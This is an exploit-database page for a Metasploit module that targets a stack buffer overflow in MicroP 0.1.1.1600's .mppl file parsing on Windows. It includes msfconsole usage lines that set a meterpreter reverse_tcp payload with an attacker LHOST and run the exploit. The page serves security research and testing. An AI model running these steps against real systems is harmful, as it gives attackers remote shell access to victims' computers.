MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow | Metasploit Exploit Database (DB)

MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow

This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based buffer overflow occurs when the content of a .mppl file gets copied onto the stack, which overwrites the lpFileName parameter of a CreateFileA() function, and results arbitrary code execution under the context of the user.

Search Other Modules


Exploit Rank

  • Great

Exploit Authors

  • James Fitts < >

Vulnerability References


Exploit Targets

  • 0 - Windows XP SP3 / Vista / 7 (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/microp_mppl
msf exploit(microp_mppl) > show payloads
msf exploit(microp_mppl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(microp_mppl) > set LHOST [MY IP ADDRESS]
msf exploit(microp_mppl) > exploit


Exploit Module Options

FILENAME The file name. (default: msf.mppl)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session